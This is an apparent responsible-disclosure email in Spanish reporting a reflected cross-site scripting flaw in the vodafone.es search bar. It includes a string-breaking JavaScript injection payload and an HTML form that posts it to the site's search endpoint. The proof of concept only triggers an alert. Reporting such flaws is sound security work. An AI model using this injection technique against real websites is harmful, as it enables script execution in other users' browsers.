vodafone.es

Soy consciente de que el email que envío no va al departamento correcto pero no he encontrado una dirección para reportar un error así que ruego que remitan el presente email al departamento encargado del desarrollo de la web.

---

Hola, he encontrado un error en su página web que permite ejecutar código javascript.

La prueba de concepto es:

- Buscar holahola'; alert('xss'); var a = '1 en la barra de búsqueda de la parte superior

o el html que os adjunto.

Un saludo.

=======


<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Vodafone proof of concept xss</title>
</head>
<body>
    
  <form method="post" id="mainsearchDS" class="search-box" action="http://www.vodafone.es/tools/es//" novalidate="true">
      <input name="desktop" type="hidden" value="particulares">
      <input name="locale" type="hidden" value="es">
      <div class="se-query">
        <input autocomplete="off" name="q" id="searchField" type="text" placeholder="Buscar" value="holahola'; alert('xss'); var a = '1" class="se-input exorbyte_ac_input">
        <input type="submit" class="btn btn-alt btn-sml" name="search-q" value="Ir">
      <i class="i-search-main"></i>
    </div>
  </form>

</body>
</html>